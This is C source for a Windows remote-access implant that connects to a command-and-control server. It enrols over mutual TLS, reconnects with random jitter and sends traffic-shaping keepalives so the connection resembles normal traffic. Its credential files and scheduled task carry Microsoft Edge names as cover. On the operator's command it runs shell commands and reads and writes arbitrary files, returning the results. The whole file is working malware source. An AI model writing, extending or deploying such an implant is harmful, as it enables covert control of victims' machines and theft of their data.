/*
 * implant.c — Windows implant: mTLS (BP1), enrollment (BP2), secure jitter
 *             (BP3), keepalive shaping (BP5).
 *
 * BP2: the binary carries only the CA cert + a single-use enrollment token
 * baked in at compile time (-DENROLLMENT_TOKEN="...").  On first run it
 * generates a 2048-bit RSA keypair in memory, builds a CSR with the token
 * as CN, sends it to the controller over one-way TLS, receives a 30-day
 * signed cert, then reinitialises to full mTLS.  No private key is ever
 * written to disk.
 */

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

#include "protocol.h"
#include "tls.h"
#include "implant_utils.h"
#include "platform.h"

#ifdef _WIN32
#include <wincrypt.h>
#endif

/*
 * implant_certs.h is generated by generate_certs.sh and contains:
 *   implant_ca_cert_pem  / implant_ca_cert_pem_len
 * (BP2: cert and key are generated at runtime — not embedded in the binary)
 */
#include "implant_certs.h"

/* BP2: enrollment token baked in at compile time via -DENROLLMENT_TOKEN="..."
 * Fall back to a placeholder so the file compiles without the flag. */
#ifndef ENROLLMENT_TOKEN
#define ENROLLMENT_TOKEN "default-token"
#endif

/* ── BP5 keepalive thread ────────────────────────────────────────────
 *
 * Sends a COMMAND_KEEPALIVE packet at random 20–40 second intervals so
 * the TCP flow looks the same whether the operator is idle or actively
 * issuing commands.  The controller discards KEEPALIVE transparently in
 * recieve_packet().
 *
 * Thread safety (OpenSSL 3.x + TLS 1.3):
 *   SSL_read (main thread) and SSL_write (keepalive thread) may run
 *   concurrently on the same SSL object.  Concurrent SSL_write calls
 *   require serialisation — g_write_lock is acquired by both the main
 *   thread (before each send_packet) and the keepalive thread.  The
 *   keepalive uses trylock so it never blocks behind a long recv().
 */

static plat_mutex_t   g_write_lock;
static volatile Conn *g_conn   = NULL;
static volatile int   g_ka_run = 0;

#ifdef _WIN32
static DWORD WINAPI keepalive_thread(LPVOID arg)
{
    (void)arg;
    while (g_ka_run) {
        SLEEP(secure_jitter_sec(30, 10));
        if (!g_ka_run) break;
        if (MUTEX_TRYLOCK(&g_write_lock)) {
            Conn *c = (Conn *)g_conn;
            if (c) {
                Packet ka = {COMMAND_KEEPALIVE, 0, 0, NULL};
                send_packet(&ka, c);
            }
            MUTEX_UNLOCK(&g_write_lock);
        }
    }
    return 0;
}
#else
static void *keepalive_thread(void *arg)
{
    (void)arg;
    while (g_ka_run) {
        SLEEP(secure_jitter_sec(30, 10));
        if (!g_ka_run) break;
        if (MUTEX_TRYLOCK(&g_write_lock)) {
            Conn *c = (Conn *)g_conn;
            if (c) {
                Packet ka = {COMMAND_KEEPALIVE, 0, 0, NULL};
                send_packet(&ka, c);
            }
            MUTEX_UNLOCK(&g_write_lock);
        }
    }
    return NULL;
}
#endif

/* Wrapper: acquire write lock, send, release */
static int locked_send(Packet *p, Conn *c)
{
    MUTEX_LOCK(&g_write_lock);
    int ok = send_packet(p, c);
    MUTEX_UNLOCK(&g_write_lock);
    return ok;
}

/* ── BP2: credential persistence ────────────────────────────────────────
 *
 * After enrollment the issued cert + in-memory key are saved to disk so the
 * implant can reconnect after a reboot (scheduled-task persistence) without
 * re-enrolling.  The single-use token is already consumed after first run.
 *
 * Paths: %APPDATA%\MicrosoftEdge\ec.dat (cert) and ek.dat (key).
 * The directory already exists on most Windows installs (Edge creates it).
 * Both files are deleted by COMMAND_SHUTDOWN so no credentials survive
 * after the operator removes the implant.
 */

static void cred_paths(char *cert_out, char *key_out, int len)
{
#ifdef _WIN32
    /* Use a consistent path across User and SYSTEM sessions.
     * C:\Users\Public is accessible to both and is where i.exe lives. */
    const char *base = "C:\\Users\\Public";
    snprintf(cert_out, len, "%s\\MicrosoftEdge\\ec.dat", base);
    snprintf(key_out,  len, "%s\\MicrosoftEdge\\ek.dat", base);
#else
    snprintf(cert_out, len, "/tmp/.ec.dat");
    snprintf(key_out,  len, "/tmp/.ek.dat");
#endif
}

static char *read_file_heap(const char *path, int *len_out)
{
    FILE *fp = fopen(path, "rb");
    if (!fp) return NULL;
    fseek(fp, 0, SEEK_END);
    long sz = ftell(fp);
    rewind(fp);
    if (sz <= 0) { fclose(fp); return NULL; }
    unsigned char *buf = malloc((size_t)sz);
    if (!buf)  { fclose(fp); return NULL; }
    if ((long)fread(buf, 1, (size_t)sz, fp) != sz)
        { fclose(fp); free(buf); return NULL; }
    fclose(fp);

#ifdef _WIN32
    DATA_BLOB bin, out;
    bin.pbData = buf;
    bin.cbData = (DWORD)sz;
    if (CryptUnprotectData(&bin, NULL, NULL, NULL, NULL, 0, &out)) {
        free(buf);
        *len_out = (int)out.cbData;
        return (char *)out.pbData;
    }
    free(buf);
    return NULL;
#else
    *len_out = (int)sz;
    return (char *)buf;
#endif
}

static void write_file_safe(const char *path, const char *data, int len)
{
#ifdef _WIN32
    /* Ensure parent directory exists */
    char dir[512];
    strncpy(dir, path, sizeof(dir) - 1);
    dir[sizeof(dir) - 1] = '\0';
    char *sep = strrchr(dir, '\\');
    if (sep) { *sep = '\0'; CreateDirectoryA(dir, NULL); }

    DATA_BLOB bin, out;
    bin.pbData = (BYTE *)data;
    bin.cbData = (DWORD)len;
    if (!CryptProtectData(&bin, L"implant-cred", NULL, NULL, NULL, 0, &out))
        return;
    data = (const char *)out.pbData;
    len  = (int)out.cbData;
#endif

    FILE *fp = fopen(path, "wb");
    if (fp) {
        fwrite(data, 1, (size_t)len, fp);
        fclose(fp);
    }

#ifdef _WIN32
    LocalFree((HLOCAL)out.pbData);
#endif
}

/* ── Connection helpers ──────────────────────────────────────────────── */

/* Open a TCP connection to the controller; return the raw fd or -1. */
static int make_raw_socket(void)
{
    const char *host     = getenv("C2_HOST");
    const char *port_env = getenv("C2_PORT");

#ifndef C2_DEFAULT_HOST
#define C2_DEFAULT_HOST "c2-server"
#endif
    if (!host || host[0] == '\0')
        host = C2_DEFAULT_HOST;

    int port = 4444;
    if (port_env && port_env[0] != '\0') {
        int p = atoi(port_env);
        if (p > 0) port = p;
    }

    int sock = socket(AF_INET, SOCK_STREAM, 0);
    if (sock < 0) return -1;

    struct sockaddr_in addr;
    memset(&addr, 0, sizeof(addr));
    addr.sin_family = AF_INET;
    addr.sin_port   = htons(port);

    if (inet_pton(AF_INET, host, &addr.sin_addr) <= 0) {
        struct hostent *he = gethostbyname(host);
        if (!he || !he->h_addr_list || !he->h_addr_list[0]) {
            CLOSE_SOCKET(sock);
            return -1;
        }
        memcpy(&addr.sin_addr, he->h_addr_list[0], he->h_length);
    }

    if (connect(sock, (struct sockaddr *)&addr, sizeof(addr)) < 0) {
        CLOSE_SOCKET(sock);
        return -1;
    }

    return sock;
}

/* BP2: one-way TLS enrollment — send CSR, receive signed cert.
 * Returns heap-allocated cert PEM on success (caller must free), NULL on
 * any failure (the caller will retry after jitter). */
static char *do_enrollment(const char *csr_pem, int csr_len, int *cert_len_out)
{
    int sock = make_raw_socket();
    if (sock < 0) return NULL;

    /* One-way TLS: controller authenticates; implant sends no client cert */
    Conn *conn = tls_client_wrap_enroll(sock);
    if (!conn) { CLOSE_SOCKET(sock); return NULL; }

    /* Send CSR */
    Packet req = {COMMAND_ENROLL_CSR, 0, csr_len, (char *)csr_pem};
    send_packet(&req, conn);

    /* Receive signed cert */
    Packet *resp = recieve_packet(conn);
    char *cert_pem = NULL;
    if (resp && resp->command_type == COMMAND_ENROLL_CERT
             && resp->payload_len > 0) {
        cert_pem = malloc(resp->payload_len);
        memcpy(cert_pem, resp->payload, resp->payload_len);
        *cert_len_out = resp->payload_len;
        free_packet(resp);
    } else {
        if (resp) free_packet(resp);
    }

    tls_conn_free(conn);
    return cert_pem;
}

/* Normal mTLS connection + HELLO */
static Conn *connect_to_controller(void)
{
    int sock = make_raw_socket();
    if (sock < 0) return NULL;

    /* BP1: perform mTLS handshake — controller verifies implant cert */
    Conn *conn = tls_client_wrap(sock);
    if (!conn) { CLOSE_SOCKET(sock); return NULL; }

    /* Send HELLO with OS info */
    char *os_info = operating_system_info();
    Packet hello = {COMMAND_HELLO, 0, (int)strlen(os_info), os_info};
    if (!locked_send(&hello, conn)) {
        free(os_info);
        tls_conn_free(conn);
        return NULL;
    }
    free(os_info);

    return conn;
}

/* ── main ────────────────────────────────────────────────────────────── */

int main(int argc, char **argv)
{
    (void)argc; (void)argv;

    platform_init();
    MUTEX_INIT(&g_write_lock);

    /* ── BP2: enrollment on first contact (or load persisted creds) ─────
     *
     * First run:
     *   1. Init OpenSSL via enrollment context.
     *   2. Generate 2048-bit RSA keypair + CSR.
     *   3. Connect to controller with CA-only TLS (no client cert).
     *   4. Send CSR; receive CA-signed cert; retry with jitter on failure.
     *   5. Save cert + key to disk for future restarts.
     *   6. Tear down enrollment context; reinit with issued cert + key.
     *
     * Subsequent runs (persistence / reboot):
     *   Load cert + key from disk — skip enrollment entirely.
     *   The single-use token was already consumed on first run.
     */
    char cred_cert_path[512], cred_key_path[512];
    cred_paths(cred_cert_path, cred_key_path, 512);

    /* Always init OpenSSL first — needed for cert validation and enrollment */
    tls_init_client_enroll(
        (const char *)implant_ca_cert_pem, implant_ca_cert_pem_len);

    int   cert_len = 0, key_len = 0;
    char *cert_pem = read_file_heap(cred_cert_path, &cert_len);
    char *key_pem  = read_file_heap(cred_key_path,  &key_len);

    /* Validate stored cert against the embedded CA.  If the CA was rotated
     * (launch.sh was re-run), the stored cert will fail this check — we must
     * delete it and re-enroll with the fresh token from the new binary. */
    int creds_valid = cert_pem && key_pem &&
                      tls_cert_signed_by_ca(cert_pem, cert_len,
                                             (const char *)implant_ca_cert_pem,
                                             implant_ca_cert_pem_len);

    if (!creds_valid) {
        /* Stale or missing credentials — delete any stale files and enroll */
        free(cert_pem); cert_pem = NULL;
        free(key_pem);  key_pem  = NULL;
        cert_len = key_len = 0;
        remove(cred_cert_path);
        remove(cred_key_path);

        char *csr_pem = NULL;
        int   csr_len = 0;
        if (!tls_gen_key_and_csr(ENROLLMENT_TOKEN,
                                  &key_pem, &key_len,
                                  &csr_pem, &csr_len)) {
            while (1) SLEEP(60);
        }

        while (!cert_pem) {
            cert_pem = do_enrollment(csr_pem, csr_len, &cert_len);
            if (!cert_pem)
                SLEEP(secure_jitter_sec(30, 10));
        }
        free(csr_pem);

        /* Save DPAPI-encrypted credentials for future restarts */
        write_file_safe(cred_cert_path, cert_pem, cert_len);
        write_file_safe(cred_key_path,  key_pem,  key_len);
    }

    /* Tear down enrollment context; reinit with issued/loaded cert + key */
    tls_cleanup();
    tls_init_client_mem(
        (const char *)implant_ca_cert_pem, implant_ca_cert_pem_len,
        cert_pem, cert_len,
        key_pem,  key_len
    );
    free(cert_pem); cert_pem = NULL;
    free(key_pem);  key_pem  = NULL;

    /* ── Connect — BP3: retry with cryptographically random jitter ──── */
    Conn *conn = NULL;
    while (!conn) {
        conn = connect_to_controller();
        if (!conn)
            SLEEP(secure_jitter_sec(30, 10));
    }

    g_conn   = conn;
    g_ka_run = 1;

    /* Start BP5 keepalive background thread */
    plat_thread_t ka_thread;
    THREAD_START(&ka_thread, keepalive_thread, NULL);
    THREAD_DETACH(&ka_thread);

    int shutdown = 0;

    while (!shutdown) {
        /* SSL_read (blocking) — safe to run concurrently with SSL_write
         * (keepalive thread) in OpenSSL 3.x TLS 1.3 full-duplex mode.   */
        Packet *pkt = recieve_packet(conn);
        if (pkt == NULL) {
            /* Connection lost — tear down and retry */
            g_conn = NULL;
            tls_conn_free(conn);
            conn = NULL;

            while (!conn) {
                conn = connect_to_controller();
                if (!conn)
                    SLEEP(secure_jitter_sec(30, 10));
            }
            g_conn = conn;
            continue;
        }

        switch (pkt->command_type) {

        case COMMAND_HEARTBEAT: {
            char *payload = "ALIVE";
            Packet resp = {COMMAND_RESPONSE, pkt->request_id,
                           (int)strlen(payload), payload};
            locked_send(&resp, conn);
            break;
        }

        case COMMAND_SET_SLEEP: {
            int duration = *(int *)pkt->payload;
            char buf[64];
            snprintf(buf, sizeof(buf), "Sleeping for %d seconds", duration);
            Packet resp = {COMMAND_RESPONSE, pkt->request_id,
                           (int)strlen(buf), buf};
            locked_send(&resp, conn);

            /* Pause keepalive, close connection, sleep, reconnect */
            g_conn = NULL;
            tls_conn_free(conn); conn = NULL;

            SLEEP(duration);

            while (!conn) {
                conn = connect_to_controller();
                if (!conn)
                    SLEEP(secure_jitter_sec(30, 10));
            }
            g_conn = conn;
            break;
        }

        case COMMAND_SHUTDOWN: {
#ifdef _WIN32
            system("schtasks /delete /tn \"MicrosoftEdgeUpdate\" /f >nul 2>&1");
            system("cmd /c del /f /q \"C:\\Users\\Public\\i.exe\" >nul 2>&1");
#endif
            /* Remove persisted credentials — leaves no trace after shutdown */
            {
                char s_cert[512], s_key[512];
                cred_paths(s_cert, s_key, 512);
                remove(s_cert);
                remove(s_key);
            }
            char *payload = "SUCCESSFULLY SHUTDOWN";
            Packet resp = {COMMAND_RESPONSE, pkt->request_id,
                           (int)strlen(payload), payload};
            locked_send(&resp, conn);
            shutdown = 1;
            break;
        }

        case COMMAND_READ_DATA: {
            char path[pkt->payload_len + 1];
            memcpy(path, pkt->payload, pkt->payload_len);
            path[pkt->payload_len] = '\0';

            FILE *fp = fopen(path, "r");
            if (!fp) {
                char *err = "file not found";
                Packet resp = {COMMAND_ERROR, pkt->request_id,
                               (int)strlen(err), err};
                locked_send(&resp, conn);
            } else {
                char output[4096];
                int  bytes = (int)fread(output, 1, sizeof(output), fp);
                Packet resp = {COMMAND_RESPONSE, pkt->request_id, bytes, output};
                locked_send(&resp, conn);
                fclose(fp);
            }
            break;
        }

        case COMMAND_WRITE_DATA: {
            char *payload  = pkt->payload;
            int   path_len = *(int *)payload;
            char  path[path_len + 1];
            memcpy(path, payload + 4, path_len);
            path[path_len] = '\0';

            char *contents     = payload + 4 + path_len;
            int   content_len  = pkt->payload_len - 4 - path_len;

            FILE *fp = fopen(path, "w");
            if (!fp) {
                char *err = "file not created/found";
                Packet resp = {COMMAND_ERROR, pkt->request_id,
                               (int)strlen(err), err};
                locked_send(&resp, conn);
            } else {
                fwrite(contents, 1, content_len, fp);
                fclose(fp);
                Packet resp = {COMMAND_RESPONSE, pkt->request_id, 0, NULL};
                locked_send(&resp, conn);
            }
            break;
        }

        case COMMAND_RUN_CMD: {
            char cmd[pkt->payload_len + 1];
            memcpy(cmd, pkt->payload, pkt->payload_len);
            cmd[pkt->payload_len] = '\0';

            FILE *fp = POPEN(cmd, "r");
            if (!fp) {
                char *err = "popen failed";
                Packet resp = {COMMAND_ERROR, pkt->request_id,
                               (int)strlen(err), err};
                locked_send(&resp, conn);
            } else {
                char output[4096];
                int  bytes = (int)fread(output, 1, sizeof(output), fp);
                Packet resp = {COMMAND_RESPONSE, pkt->request_id, bytes, output};
                locked_send(&resp, conn);
                PCLOSE(fp);
            }
            break;
        }

        default:
            break;
        }

        free_packet(pkt);
    }

    g_ka_run = 0;
    g_conn   = NULL;
    if (conn) tls_conn_free(conn);
    tls_cleanup();
    MUTEX_DESTROY(&g_write_lock);
    platform_cleanup();
    return 0;
}
